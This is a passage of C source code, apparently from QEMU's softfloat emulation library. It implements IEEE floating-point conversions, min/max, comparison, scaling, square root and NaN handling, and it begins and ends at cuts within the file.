    return float16_to_int64_scalbn(a, float_round_to_zero, 0, s);
}

int16_t float32_to_int16_round_to_zero(float32 a, float_status *s)
{
    return float32_to_int16_scalbn(a, float_round_to_zero, 0, s);
}

int32_t float32_to_int32_round_to_zero(float32 a, float_status *s)
{
    return float32_to_int32_scalbn(a, float_round_to_zero, 0, s);
}

int64_t float32_to_int64_round_to_zero(float32 a, float_status *s)
{
    return float32_to_int64_scalbn(a, float_round_to_zero, 0, s);
}

int16_t float64_to_int16_round_to_zero(float64 a, float_status *s)
{
    return float64_to_int16_scalbn(a, float_round_to_zero, 0, s);
}

int32_t float64_to_int32_round_to_zero(float64 a, float_status *s)
{
    return float64_to_int32_scalbn(a, float_round_to_zero, 0, s);
}

int64_t float64_to_int64_round_to_zero(float64 a, float_status *s)
{
    return float64_to_int64_scalbn(a, float_round_to_zero, 0, s);
}

/*
 *  Returns the result of converting the floating-point value `a' to
 *  the unsigned integer format. The conversion is performed according
 *  to the IEC/IEEE Standard for Binary Floating-Point
 *  Arithmetic---which means in particular that the conversion is
 *  rounded according to the current rounding mode. If `a' is a NaN,
 *  the largest unsigned integer is returned. Otherwise, if the
 *  conversion overflows, the largest unsigned integer is returned.
 *  If `a' is negative, zero is returned: negative values that round
 *  to zero raise at most the inexact exception flag, while negative
 *  values that do not round to zero raise the invalid exception flag.
 */

static uint64_t round_to_uint_and_pack(FloatParts in, int rmode, int scale,
                                       uint64_t max, float_status *s)
{
    int orig_flags = get_float_exception_flags(s);
    FloatParts p = round_to_int(in, rmode, scale, s);
    uint64_t r;

    switch (p.cls) {
    case float_class_snan:
    case float_class_qnan:
        s->float_exception_flags = orig_flags | float_flag_invalid;
        return max;
    case float_class_inf:
        s->float_exception_flags = orig_flags | float_flag_invalid;
        return p.sign ? 0 : max;
    case float_class_zero:
        return 0;
    case float_class_normal:
        if (p.sign) {
            s->float_exception_flags = orig_flags | float_flag_invalid;
            return 0;
        }

        if (p.exp < DECOMPOSED_BINARY_POINT) {
            r = p.frac >> (DECOMPOSED_BINARY_POINT - p.exp);
        } else if (p.exp - DECOMPOSED_BINARY_POINT < 2) {
            r = p.frac << (p.exp - DECOMPOSED_BINARY_POINT);
        } else {
            s->float_exception_flags = orig_flags | float_flag_invalid;
            return max;
        }

        /* For uint64 this will never trip, but if p.exp is too large
         * to shift a decomposed fraction we shall have exited via the
         * 3rd leg above.
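         *
         * Concretely, under nearest-even rounding
         * float64_to_uint32(-0.25) rounds to zero and returns 0 with
         * only inexact raised, while float64_to_uint32(-1.0) takes
         * the p.sign branch above and returns 0 with invalid raised
         * instead.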
*/ if (r > max) { s->float_exception_flags = orig_flags | float_flag_invalid; return max; } return r; default: g_assert_not_reached(); return max; } } uint16_t float16_to_uint16_scalbn(float16 a, int rmode, int scale, float_status *s) { return round_to_uint_and_pack(float16_unpack_canonical(a, s), rmode, scale, UINT16_MAX, s); } uint32_t float16_to_uint32_scalbn(float16 a, int rmode, int scale, float_status *s) { return round_to_uint_and_pack(float16_unpack_canonical(a, s), rmode, scale, UINT32_MAX, s); } uint64_t float16_to_uint64_scalbn(float16 a, int rmode, int scale, float_status *s) { return round_to_uint_and_pack(float16_unpack_canonical(a, s), rmode, scale, UINT64_MAX, s); } uint16_t float32_to_uint16_scalbn(float32 a, int rmode, int scale, float_status *s) { return round_to_uint_and_pack(float32_unpack_canonical(a, s), rmode, scale, UINT16_MAX, s); } uint32_t float32_to_uint32_scalbn(float32 a, int rmode, int scale, float_status *s) { return round_to_uint_and_pack(float32_unpack_canonical(a, s), rmode, scale, UINT32_MAX, s); } uint64_t float32_to_uint64_scalbn(float32 a, int rmode, int scale, float_status *s) { return round_to_uint_and_pack(float32_unpack_canonical(a, s), rmode, scale, UINT64_MAX, s); } uint16_t float64_to_uint16_scalbn(float64 a, int rmode, int scale, float_status *s) { return round_to_uint_and_pack(float64_unpack_canonical(a, s), rmode, scale, UINT16_MAX, s); } uint32_t float64_to_uint32_scalbn(float64 a, int rmode, int scale, float_status *s) { return round_to_uint_and_pack(float64_unpack_canonical(a, s), rmode, scale, UINT32_MAX, s); } uint64_t float64_to_uint64_scalbn(float64 a, int rmode, int scale, float_status *s) { return round_to_uint_and_pack(float64_unpack_canonical(a, s), rmode, scale, UINT64_MAX, s); } uint16_t float16_to_uint16(float16 a, float_status *s) { return float16_to_uint16_scalbn(a, s->float_rounding_mode, 0, s); } uint32_t float16_to_uint32(float16 a, float_status *s) { return float16_to_uint32_scalbn(a, s->float_rounding_mode, 0, s); } uint64_t float16_to_uint64(float16 a, float_status *s) { return float16_to_uint64_scalbn(a, s->float_rounding_mode, 0, s); } uint16_t float32_to_uint16(float32 a, float_status *s) { return float32_to_uint16_scalbn(a, s->float_rounding_mode, 0, s); } uint32_t float32_to_uint32(float32 a, float_status *s) { return float32_to_uint32_scalbn(a, s->float_rounding_mode, 0, s); } uint64_t float32_to_uint64(float32 a, float_status *s) { return float32_to_uint64_scalbn(a, s->float_rounding_mode, 0, s); } uint16_t float64_to_uint16(float64 a, float_status *s) { return float64_to_uint16_scalbn(a, s->float_rounding_mode, 0, s); } uint32_t float64_to_uint32(float64 a, float_status *s) { return float64_to_uint32_scalbn(a, s->float_rounding_mode, 0, s); } uint64_t float64_to_uint64(float64 a, float_status *s) { return float64_to_uint64_scalbn(a, s->float_rounding_mode, 0, s); } uint16_t float16_to_uint16_round_to_zero(float16 a, float_status *s) { return float16_to_uint16_scalbn(a, float_round_to_zero, 0, s); } uint32_t float16_to_uint32_round_to_zero(float16 a, float_status *s) { return float16_to_uint32_scalbn(a, float_round_to_zero, 0, s); } uint64_t float16_to_uint64_round_to_zero(float16 a, float_status *s) { return float16_to_uint64_scalbn(a, float_round_to_zero, 0, s); } uint16_t float32_to_uint16_round_to_zero(float32 a, float_status *s) { return float32_to_uint16_scalbn(a, float_round_to_zero, 0, s); } uint32_t float32_to_uint32_round_to_zero(float32 a, float_status *s) { return float32_to_uint32_scalbn(a, 
float_round_to_zero, 0, s); } uint64_t float32_to_uint64_round_to_zero(float32 a, float_status *s) { return float32_to_uint64_scalbn(a, float_round_to_zero, 0, s); } uint16_t float64_to_uint16_round_to_zero(float64 a, float_status *s) { return float64_to_uint16_scalbn(a, float_round_to_zero, 0, s); } uint32_t float64_to_uint32_round_to_zero(float64 a, float_status *s) { return float64_to_uint32_scalbn(a, float_round_to_zero, 0, s); } uint64_t float64_to_uint64_round_to_zero(float64 a, float_status *s) { return float64_to_uint64_scalbn(a, float_round_to_zero, 0, s); } /* * Integer to float conversions * * Returns the result of converting the two's complement integer `a' * to the floating-point format. The conversion is performed according * to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. */ static FloatParts int_to_float(int64_t a, int scale, float_status *status) { FloatParts r = { .sign = false }; if (a == 0) { r.cls = float_class_zero; } else { uint64_t f = a; int shift; r.cls = float_class_normal; if (a < 0) { #ifdef _MSC_VER f = 0ULL - f; #else f = -f; #endif r.sign = true; } shift = clz64(f) - 1; scale = MIN(MAX(scale, -0x10000), 0x10000); r.exp = DECOMPOSED_BINARY_POINT - shift + scale; r.frac = (shift < 0 ? DECOMPOSED_IMPLICIT_BIT : f << shift); } return r; } float16 int64_to_float16_scalbn(int64_t a, int scale, float_status *status) { FloatParts pa = int_to_float(a, scale, status); return float16_round_pack_canonical(pa, status); } float16 int32_to_float16_scalbn(int32_t a, int scale, float_status *status) { return int64_to_float16_scalbn(a, scale, status); } float16 int16_to_float16_scalbn(int16_t a, int scale, float_status *status) { return int64_to_float16_scalbn(a, scale, status); } float16 int64_to_float16(int64_t a, float_status *status) { return int64_to_float16_scalbn(a, 0, status); } float16 int32_to_float16(int32_t a, float_status *status) { return int64_to_float16_scalbn(a, 0, status); } float16 int16_to_float16(int16_t a, float_status *status) { return int64_to_float16_scalbn(a, 0, status); } float32 int64_to_float32_scalbn(int64_t a, int scale, float_status *status) { FloatParts pa = int_to_float(a, scale, status); return float32_round_pack_canonical(pa, status); } float32 int32_to_float32_scalbn(int32_t a, int scale, float_status *status) { return int64_to_float32_scalbn(a, scale, status); } float32 int16_to_float32_scalbn(int16_t a, int scale, float_status *status) { return int64_to_float32_scalbn(a, scale, status); } float32 int64_to_float32(int64_t a, float_status *status) { return int64_to_float32_scalbn(a, 0, status); } float32 int32_to_float32(int32_t a, float_status *status) { return int64_to_float32_scalbn(a, 0, status); } float32 int16_to_float32(int16_t a, float_status *status) { return int64_to_float32_scalbn(a, 0, status); } float64 int64_to_float64_scalbn(int64_t a, int scale, float_status *status) { FloatParts pa = int_to_float(a, scale, status); return float64_round_pack_canonical(pa, status); } float64 int32_to_float64_scalbn(int32_t a, int scale, float_status *status) { return int64_to_float64_scalbn(a, scale, status); } float64 int16_to_float64_scalbn(int16_t a, int scale, float_status *status) { return int64_to_float64_scalbn(a, scale, status); } float64 int64_to_float64(int64_t a, float_status *status) { return int64_to_float64_scalbn(a, 0, status); } float64 int32_to_float64(int32_t a, float_status *status) { return int64_to_float64_scalbn(a, 0, status); } float64 int16_to_float64(int16_t a, float_status *status) { return 
int64_to_float64_scalbn(a, 0, status); } /* * Unsigned Integer to float conversions * * Returns the result of converting the unsigned integer `a' to the * floating-point format. The conversion is performed according to the * IEC/IEEE Standard for Binary Floating-Point Arithmetic. */ static FloatParts uint_to_float(uint64_t a, int scale, float_status *status) { FloatParts r = { .sign = false }; if (a == 0) { r.cls = float_class_zero; } else { scale = MIN(MAX(scale, -0x10000), 0x10000); r.cls = float_class_normal; if ((int64_t)a < 0) { r.exp = DECOMPOSED_BINARY_POINT + 1 + scale; shift64RightJamming(a, 1, &a); r.frac = a; } else { int shift = clz64(a) - 1; r.exp = DECOMPOSED_BINARY_POINT - shift + scale; r.frac = a << shift; } } return r; } float16 uint64_to_float16_scalbn(uint64_t a, int scale, float_status *status) { FloatParts pa = uint_to_float(a, scale, status); return float16_round_pack_canonical(pa, status); } float16 uint32_to_float16_scalbn(uint32_t a, int scale, float_status *status) { return uint64_to_float16_scalbn(a, scale, status); } float16 uint16_to_float16_scalbn(uint16_t a, int scale, float_status *status) { return uint64_to_float16_scalbn(a, scale, status); } float16 uint64_to_float16(uint64_t a, float_status *status) { return uint64_to_float16_scalbn(a, 0, status); } float16 uint32_to_float16(uint32_t a, float_status *status) { return uint64_to_float16_scalbn(a, 0, status); } float16 uint16_to_float16(uint16_t a, float_status *status) { return uint64_to_float16_scalbn(a, 0, status); } float32 uint64_to_float32_scalbn(uint64_t a, int scale, float_status *status) { FloatParts pa = uint_to_float(a, scale, status); return float32_round_pack_canonical(pa, status); } float32 uint32_to_float32_scalbn(uint32_t a, int scale, float_status *status) { return uint64_to_float32_scalbn(a, scale, status); } float32 uint16_to_float32_scalbn(uint16_t a, int scale, float_status *status) { return uint64_to_float32_scalbn(a, scale, status); } float32 uint64_to_float32(uint64_t a, float_status *status) { return uint64_to_float32_scalbn(a, 0, status); } float32 uint32_to_float32(uint32_t a, float_status *status) { return uint64_to_float32_scalbn(a, 0, status); } float32 uint16_to_float32(uint16_t a, float_status *status) { return uint64_to_float32_scalbn(a, 0, status); } float64 uint64_to_float64_scalbn(uint64_t a, int scale, float_status *status) { FloatParts pa = uint_to_float(a, scale, status); return float64_round_pack_canonical(pa, status); } float64 uint32_to_float64_scalbn(uint32_t a, int scale, float_status *status) { return uint64_to_float64_scalbn(a, scale, status); } float64 uint16_to_float64_scalbn(uint16_t a, int scale, float_status *status) { return uint64_to_float64_scalbn(a, scale, status); } float64 uint64_to_float64(uint64_t a, float_status *status) { return uint64_to_float64_scalbn(a, 0, status); } float64 uint32_to_float64(uint32_t a, float_status *status) { return uint64_to_float64_scalbn(a, 0, status); } float64 uint16_to_float64(uint16_t a, float_status *status) { return uint64_to_float64_scalbn(a, 0, status); } /* Float Min/Max */ /* min() and max() functions. These can't be implemented as * 'compare and pick one input' because that would mishandle * NaNs and +0 vs -0. * * minnum() and maxnum() functions. These are similar to the min() * and max() functions but if one of the arguments is a QNaN and * the other is numerical then the numerical argument is returned. * SNaNs will get quietened before being returned. 
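 * For instance, minnum(qNaN, 2.0) returns 2.0, while min(qNaN, 2.0)
 * returns the NaN; an sNaN operand raises the invalid exception in
 * either case.
 *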
 * minnum() and maxnum() correspond to the IEEE 754-2008 minNum()
 * and maxNum() operations. min() and max() are the typical min/max
 * semantics provided by many CPUs which predate that specification.
 *
 * minnummag() and maxnummag() functions correspond to minNumMag()
 * and maxNumMag() from IEEE 754-2008.
 */
static FloatParts minmax_floats(FloatParts a, FloatParts b, bool ismin,
                                bool ieee, bool ismag, float_status *s)
{
    if (unlikely(is_nan(a.cls) || is_nan(b.cls))) {
        if (ieee) {
            /* Takes two floating-point values `a' and `b', one of
             * which is a NaN, and returns the appropriate NaN
             * result. If either `a' or `b' is a signaling NaN,
             * the invalid exception is raised.
             */
            if (is_snan(a.cls) || is_snan(b.cls)) {
                return pick_nan(a, b, s);
            } else if (is_nan(a.cls) && !is_nan(b.cls)) {
                return b;
            } else if (is_nan(b.cls) && !is_nan(a.cls)) {
                return a;
            }
        }
        return pick_nan(a, b, s);
    } else {
        int a_exp = 0, b_exp = 0;

        switch (a.cls) {
        case float_class_normal:
            a_exp = a.exp;
            break;
        case float_class_inf:
            a_exp = INT_MAX;
            break;
        case float_class_zero:
            a_exp = INT_MIN;
            break;
        default:
            g_assert_not_reached();
            break;
        }
        switch (b.cls) {
        case float_class_normal:
            b_exp = b.exp;
            break;
        case float_class_inf:
            b_exp = INT_MAX;
            break;
        case float_class_zero:
            b_exp = INT_MIN;
            break;
        default:
            g_assert_not_reached();
            break;
        }

        if (ismag && (a_exp != b_exp || a.frac != b.frac)) {
            bool a_less = a_exp < b_exp;
            if (a_exp == b_exp) {
                a_less = a.frac < b.frac;
            }
            return a_less ^ ismin ? b : a;
        }

        if (a.sign == b.sign) {
            bool a_less = a_exp < b_exp;
            if (a_exp == b_exp) {
                a_less = a.frac < b.frac;
            }
            return a.sign ^ a_less ^ ismin ? b : a;
        } else {
            return a.sign ^ ismin ? b : a;
        }
    }
}

#define MINMAX(sz, name, ismin, isieee, ismag)                          \
float ## sz float ## sz ## _ ## name(float ## sz a, float ## sz b,      \
                                     float_status *s)                   \
{                                                                       \
    FloatParts pa = float ## sz ## _unpack_canonical(a, s);             \
    FloatParts pb = float ## sz ## _unpack_canonical(b, s);             \
    FloatParts pr = minmax_floats(pa, pb, ismin, isieee, ismag, s);     \
                                                                        \
    return float ## sz ## _round_pack_canonical(pr, s);                 \
}

MINMAX(16, min, true, false, false)
MINMAX(16, minnum, true, true, false)
MINMAX(16, minnummag, true, true, true)
MINMAX(16, max, false, false, false)
MINMAX(16, maxnum, false, true, false)
MINMAX(16, maxnummag, false, true, true)

MINMAX(32, min, true, false, false)
MINMAX(32, minnum, true, true, false)
MINMAX(32, minnummag, true, true, true)
MINMAX(32, max, false, false, false)
MINMAX(32, maxnum, false, true, false)
MINMAX(32, maxnummag, false, true, true)

MINMAX(64, min, true, false, false)
MINMAX(64, minnum, true, true, false)
MINMAX(64, minnummag, true, true, true)
MINMAX(64, max, false, false, false)
MINMAX(64, maxnum, false, true, false)
MINMAX(64, maxnummag, false, true, true)

#undef MINMAX

/* Floating point compare */
static int compare_floats(FloatParts a, FloatParts b, bool is_quiet,
                          float_status *s)
{
    if (is_nan(a.cls) || is_nan(b.cls)) {
        if (!is_quiet ||
            a.cls == float_class_snan ||
            b.cls == float_class_snan) {
            s->float_exception_flags |= float_flag_invalid;
        }
        return float_relation_unordered;
    }

    if (a.cls == float_class_zero) {
        if (b.cls == float_class_zero) {
            return float_relation_equal;
        }
        return b.sign ? float_relation_greater : float_relation_less;
    } else if (b.cls == float_class_zero) {
        return a.sign ? float_relation_less : float_relation_greater;
    }

    /* The only really important thing about infinity is its sign. If
     * both are infinities the sign marks the smallest of the two.
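     * E.g. compare(-inf, -inf) is float_relation_equal, while
     * compare(-inf, x) for any other non-NaN x is
     * float_relation_less.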
*/ if (a.cls == float_class_inf) { if ((b.cls == float_class_inf) && (a.sign == b.sign)) { return float_relation_equal; } return a.sign ? float_relation_less : float_relation_greater; } else if (b.cls == float_class_inf) { return b.sign ? float_relation_greater : float_relation_less; } if (a.sign != b.sign) { return a.sign ? float_relation_less : float_relation_greater; } if (a.exp == b.exp) { if (a.frac == b.frac) { return float_relation_equal; } if (a.sign) { return a.frac > b.frac ? float_relation_less : float_relation_greater; } else { return a.frac > b.frac ? float_relation_greater : float_relation_less; } } else { if (a.sign) { return a.exp > b.exp ? float_relation_less : float_relation_greater; } else { return a.exp > b.exp ? float_relation_greater : float_relation_less; } } } #define COMPARE(name, attr, sz) \ static int attr \ name(float ## sz a, float ## sz b, bool is_quiet, float_status *s) \ { \ FloatParts pa = float ## sz ## _unpack_canonical(a, s); \ FloatParts pb = float ## sz ## _unpack_canonical(b, s); \ return compare_floats(pa, pb, is_quiet, s); \ } COMPARE(soft_f16_compare, QEMU_FLATTEN, 16) COMPARE(soft_f32_compare, QEMU_SOFTFLOAT_ATTR, 32) COMPARE(soft_f64_compare, QEMU_SOFTFLOAT_ATTR, 64) #undef COMPARE int float16_compare(float16 a, float16 b, float_status *s) { return soft_f16_compare(a, b, false, s); } int float16_compare_quiet(float16 a, float16 b, float_status *s) { return soft_f16_compare(a, b, true, s); } static int QEMU_FLATTEN f32_compare(float32 xa, float32 xb, bool is_quiet, float_status *s) { union_float32 ua, ub; ua.s = xa; ub.s = xb; if (QEMU_NO_HARDFLOAT) { goto soft; } float32_input_flush2(&ua.s, &ub.s, s); if (isgreaterequal(ua.h, ub.h)) { if (isgreater(ua.h, ub.h)) { return float_relation_greater; } return float_relation_equal; } if (likely(isless(ua.h, ub.h))) { return float_relation_less; } /* The only condition remaining is unordered. * Fall through to set flags. */ soft: return soft_f32_compare(ua.s, ub.s, is_quiet, s); } int float32_compare(float32 a, float32 b, float_status *s) { return f32_compare(a, b, false, s); } int float32_compare_quiet(float32 a, float32 b, float_status *s) { return f32_compare(a, b, true, s); } static int QEMU_FLATTEN f64_compare(float64 xa, float64 xb, bool is_quiet, float_status *s) { union_float64 ua, ub; ua.s = xa; ub.s = xb; if (QEMU_NO_HARDFLOAT) { goto soft; } float64_input_flush2(&ua.s, &ub.s, s); if (isgreaterequal(ua.h, ub.h)) { if (isgreater(ua.h, ub.h)) { return float_relation_greater; } return float_relation_equal; } if (likely(isless(ua.h, ub.h))) { return float_relation_less; } /* The only condition remaining is unordered. * Fall through to set flags. */ soft: return soft_f64_compare(ua.s, ub.s, is_quiet, s); } int float64_compare(float64 a, float64 b, float_status *s) { return f64_compare(a, b, false, s); } int float64_compare_quiet(float64 a, float64 b, float_status *s) { return f64_compare(a, b, true, s); } /* Multiply A by 2 raised to the power N. */ static FloatParts scalbn_decomposed(FloatParts a, int n, float_status *s) { if (unlikely(is_nan(a.cls))) { return return_nan(a, s); } if (a.cls == float_class_normal) { /* The largest float type (even though not supported by FloatParts) * is float128, which has a 15 bit exponent. Bounding N to 16 bits * still allows rounding to infinity, without allowing overflow * within the int32_t that backs FloatParts.exp. 
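         * E.g. scaling a normal float32 by n = INT_MAX is clamped to
         * n = 0x10000; a.exp still fits in int32_t, and the
         * subsequent round-and-pack overflows to infinity (under
         * nearest-even rounding) with overflow and inexact raised.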
         */
        n = MIN(MAX(n, -0x10000), 0x10000);
        a.exp += n;
    }
    return a;
}

float16 float16_scalbn(float16 a, int n, float_status *status)
{
    FloatParts pa = float16_unpack_canonical(a, status);
    FloatParts pr = scalbn_decomposed(pa, n, status);
    return float16_round_pack_canonical(pr, status);
}

float32 float32_scalbn(float32 a, int n, float_status *status)
{
    FloatParts pa = float32_unpack_canonical(a, status);
    FloatParts pr = scalbn_decomposed(pa, n, status);
    return float32_round_pack_canonical(pr, status);
}

float64 float64_scalbn(float64 a, int n, float_status *status)
{
    FloatParts pa = float64_unpack_canonical(a, status);
    FloatParts pr = scalbn_decomposed(pa, n, status);
    return float64_round_pack_canonical(pr, status);
}

/*
 * Square Root
 *
 * The old softfloat code did an approximation step before zeroing in
 * on the final result. However, for simplicity we just compute the
 * square root by iterating down from the implicit bit to enough extra
 * bits to ensure we get a correctly rounded result.
 *
 * This does mean, however, that the calculation is slower than before,
 * especially for 64 bit floats.
 */

static FloatParts sqrt_float(FloatParts a, float_status *s, const FloatFmt *p)
{
    uint64_t a_frac, r_frac, s_frac;
    int bit, last_bit;

    if (is_nan(a.cls)) {
        return return_nan(a, s);
    }
    if (a.cls == float_class_zero) {
        return a;  /* sqrt(+-0) = +-0 */
    }
    if (a.sign) {
        s->float_exception_flags |= float_flag_invalid;
        return parts_default_nan(s);
    }
    if (a.cls == float_class_inf) {
        return a;  /* sqrt(+inf) = +inf */
    }

    assert(a.cls == float_class_normal);

    /* We need two overflow bits at the top. Adding room for that is a
     * right shift. If the exponent is odd, we can discard the low bit
     * by multiplying the fraction by 2; that's a left shift. Combine
     * those and we shift right if the exponent is even.
     */
    a_frac = a.frac;
    if (!(a.exp & 1)) {
        a_frac >>= 1;
    }
    a.exp >>= 1;

    /* Bit-by-bit computation of sqrt. */
    r_frac = 0;
    s_frac = 0;

    /* Iterate from implicit bit down to the 3 extra bits to compute a
     * properly rounded result. Remember we've inserted one more bit
     * at the top, so these positions are one less.
     */
    bit = DECOMPOSED_BINARY_POINT - 1;
    last_bit = MAX(p->frac_shift - 4, 0);

    do {
        uint64_t q = 1ULL << bit;
        uint64_t t_frac = s_frac + q;
        if (t_frac <= a_frac) {
            s_frac = t_frac + q;
            a_frac -= t_frac;
            r_frac += q;
        }
        a_frac <<= 1;
    } while (--bit >= last_bit);

    /* Undo the right shift done above. If there is any remaining
     * fraction, the result is inexact. Set the sticky bit.
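     * E.g. for sqrt(2.0) the loop above cannot exhaust a_frac, since
     * sqrt(2) has no finite binary expansion; a_frac is non-zero
     * here, the sticky bit is set, and rounding raises inexact.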
*/ a.frac = (r_frac << 1) + (a_frac != 0); return a; } float16 QEMU_FLATTEN float16_sqrt(float16 a, float_status *status) { FloatParts pa = float16_unpack_canonical(a, status); FloatParts pr = sqrt_float(pa, status, &float16_params); return float16_round_pack_canonical(pr, status); } static float32 QEMU_SOFTFLOAT_ATTR soft_f32_sqrt(float32 a, float_status *status) { FloatParts pa = float32_unpack_canonical(a, status); FloatParts pr = sqrt_float(pa, status, &float32_params); return float32_round_pack_canonical(pr, status); } static float64 QEMU_SOFTFLOAT_ATTR soft_f64_sqrt(float64 a, float_status *status) { FloatParts pa = float64_unpack_canonical(a, status); FloatParts pr = sqrt_float(pa, status, &float64_params); return float64_round_pack_canonical(pr, status); } float32 QEMU_FLATTEN float32_sqrt(float32 xa, float_status *s) { union_float32 ua, ur; ua.s = xa; if (unlikely(!can_use_fpu(s))) { goto soft; } float32_input_flush1(&ua.s, s); if (QEMU_HARDFLOAT_1F32_USE_FP) { if (unlikely(!(fpclassify(ua.h) == FP_NORMAL || fpclassify(ua.h) == FP_ZERO) || signbit(ua.h))) { goto soft; } } else if (unlikely(!float32_is_zero_or_normal(ua.s) || float32_is_neg(ua.s))) { goto soft; } ur.h = sqrtf(ua.h); return ur.s; soft: return soft_f32_sqrt(ua.s, s); } float64 QEMU_FLATTEN float64_sqrt(float64 xa, float_status *s) { union_float64 ua, ur; ua.s = xa; if (unlikely(!can_use_fpu(s))) { goto soft; } float64_input_flush1(&ua.s, s); if (QEMU_HARDFLOAT_1F64_USE_FP) { if (unlikely(!(fpclassify(ua.h) == FP_NORMAL || fpclassify(ua.h) == FP_ZERO) || signbit(ua.h))) { goto soft; } } else if (unlikely(!float64_is_zero_or_normal(ua.s) || float64_is_neg(ua.s))) { goto soft; } ur.h = sqrt(ua.h); return ur.s; soft: return soft_f64_sqrt(ua.s, s); } /*---------------------------------------------------------------------------- | The pattern for a default generated NaN. *----------------------------------------------------------------------------*/ float16 float16_default_nan(float_status *status) { FloatParts p = parts_default_nan(status); p.frac >>= float16_params.frac_shift; return float16_pack_raw(p); } float32 float32_default_nan(float_status *status) { FloatParts p = parts_default_nan(status); p.frac >>= float32_params.frac_shift; return float32_pack_raw(p); } float64 float64_default_nan(float_status *status) { FloatParts p = parts_default_nan(status); p.frac >>= float64_params.frac_shift; return float64_pack_raw(p); } float128 float128_default_nan(float_status *status) { FloatParts p = parts_default_nan(status); float128 r; /* Extrapolate from the choices made by parts_default_nan to fill * in the quad-floating format. If the low bit is set, assume we * want to set all non-snan bits. */ #ifdef _MSC_VER r.low = 0ULL - (p.frac & 1); #else r.low = -(p.frac & 1); #endif r.high = p.frac >> (DECOMPOSED_BINARY_POINT - 48); r.high |= UINT64_C(0x7FFF000000000000); r.high |= (uint64_t)p.sign << 63; return r; } /*---------------------------------------------------------------------------- | Returns a quiet NaN from a signalling NaN for the floating point value `a'. 
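| For example, on targets where a clear msb of the fraction marks a
| signaling NaN (status->snan_bit_is_one == 0), float32_silence_nan
| maps the sNaN pattern 0x7F800001 to the qNaN 0x7FC00001.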
*----------------------------------------------------------------------------*/ float16 float16_silence_nan(float16 a, float_status *status) { FloatParts p = float16_unpack_raw(a); p.frac <<= float16_params.frac_shift; p = parts_silence_nan(p, status); p.frac >>= float16_params.frac_shift; return float16_pack_raw(p); } float32 float32_silence_nan(float32 a, float_status *status) { FloatParts p = float32_unpack_raw(a); p.frac <<= float32_params.frac_shift; p = parts_silence_nan(p, status); p.frac >>= float32_params.frac_shift; return float32_pack_raw(p); } float64 float64_silence_nan(float64 a, float_status *status) { FloatParts p = float64_unpack_raw(a); p.frac <<= float64_params.frac_shift; p = parts_silence_nan(p, status); p.frac >>= float64_params.frac_shift; return float64_pack_raw(p); } /*---------------------------------------------------------------------------- | If `a' is denormal and we are in flush-to-zero mode then set the | input-denormal exception and return zero. Otherwise just return the value. *----------------------------------------------------------------------------*/ static bool parts_squash_denormal(FloatParts p, float_status *status) { if (p.exp == 0 && p.frac != 0) { float_raise(float_flag_input_denormal, status); return true; } return false; } float16 float16_squash_input_denormal(float16 a, float_status *status) { if (status->flush_inputs_to_zero) { FloatParts p = float16_unpack_raw(a); if (parts_squash_denormal(p, status)) { return float16_set_sign(float16_zero, p.sign); } } return a; } float32 float32_squash_input_denormal(float32 a, float_status *status) { if (status->flush_inputs_to_zero) { FloatParts p = float32_unpack_raw(a); if (parts_squash_denormal(p, status)) { return float32_set_sign(float32_zero, p.sign); } } return a; } float64 float64_squash_input_denormal(float64 a, float_status *status) { if (status->flush_inputs_to_zero) { FloatParts p = float64_unpack_raw(a); if (parts_squash_denormal(p, status)) { return float64_set_sign(float64_zero, p.sign); } } return a; } /*---------------------------------------------------------------------------- | Takes a 64-bit fixed-point value `absZ' with binary point between bits 6 | and 7, and returns the properly rounded 32-bit integer corresponding to the | input. If `zSign' is 1, the input is negated before being converted to an | integer. Bit 63 of `absZ' must be zero. Ordinarily, the fixed-point input | is simply rounded to an integer, with the inexact exception raised if the | input cannot be represented exactly as an integer. However, if the fixed- | point input is too large, the invalid exception is raised and the largest | positive or negative integer is returned. *----------------------------------------------------------------------------*/ static int32_t roundAndPackInt32(flag zSign, uint64_t absZ, float_status *status) { int8_t roundingMode; flag roundNearestEven; int8_t roundIncrement, roundBits; int32_t z; roundingMode = status->float_rounding_mode; roundNearestEven = ( roundingMode == float_round_nearest_even ); switch (roundingMode) { case float_round_nearest_even: case float_round_ties_away: roundIncrement = 0x40; break; case float_round_to_zero: roundIncrement = 0; break; case float_round_up: roundIncrement = zSign ? 0 : 0x7f; break; case float_round_down: roundIncrement = zSign ? 0x7f : 0; break; case float_round_to_odd: roundIncrement = absZ & 0x80 ? 
0 : 0x7f; break; default: abort(); } roundBits = absZ & 0x7F; absZ = ( absZ + roundIncrement )>>7; absZ &= ~ ( ( ( roundBits ^ 0x40 ) == 0 ) & roundNearestEven ); z = absZ; if ( zSign ) z = - z; if ( ( absZ>>32 ) || ( z && ( ( z < 0 ) ^ zSign ) ) ) { float_raise(float_flag_invalid, status); return zSign ? INT32_MIN : INT32_MAX; } if (roundBits) { status->float_exception_flags |= float_flag_inexact; } return z; } /*---------------------------------------------------------------------------- | Takes the 128-bit fixed-point value formed by concatenating `absZ0' and | `absZ1', with binary point between bits 63 and 64 (between the input words), | and returns the properly rounded 64-bit integer corresponding to the input. | If `zSign' is 1, the input is negated before being converted to an integer. | Ordinarily, the fixed-point input is simply rounded to an integer, with | the inexact exception raised if the input cannot be represented exactly as | an integer. However, if the fixed-point input is too large, the invalid | exception is raised and the largest positive or negative integer is | returned. *----------------------------------------------------------------------------*/ static int64_t roundAndPackInt64(flag zSign, uint64_t absZ0, uint64_t absZ1, float_status *status) { int8_t roundingMode; flag roundNearestEven, increment; int64_t z; roundingMode = status->float_rounding_mode; roundNearestEven = ( roundingMode == float_round_nearest_even ); switch (roundingMode) { case float_round_nearest_even: case float_round_ties_away: increment = ((int64_t) absZ1 < 0); break; case float_round_to_zero: increment = 0; break; case float_round_up: increment = !zSign && absZ1; break; case float_round_down: increment = zSign && absZ1; break; case float_round_to_odd: increment = !(absZ0 & 1) && absZ1; break; default: abort(); } if ( increment ) { ++absZ0; if ( absZ0 == 0 ) goto overflow; absZ0 &= ~ ( ( (uint64_t) ( absZ1<<1 ) == 0 ) & roundNearestEven ); } z = absZ0; if ( zSign ) z = - z; if ( z && ( ( z < 0 ) ^ zSign ) ) { overflow: float_raise(float_flag_invalid, status); return zSign ? INT64_MIN : INT64_MAX; } if (absZ1) { status->float_exception_flags |= float_flag_inexact; } return z; } /*---------------------------------------------------------------------------- | Takes the 128-bit fixed-point value formed by concatenating `absZ0' and | `absZ1', with binary point between bits 63 and 64 (between the input words), | and returns the properly rounded 64-bit unsigned integer corresponding to the | input. Ordinarily, the fixed-point input is simply rounded to an integer, | with the inexact exception raised if the input cannot be represented exactly | as an integer. However, if the fixed-point input is too large, the invalid | exception is raised and the largest unsigned 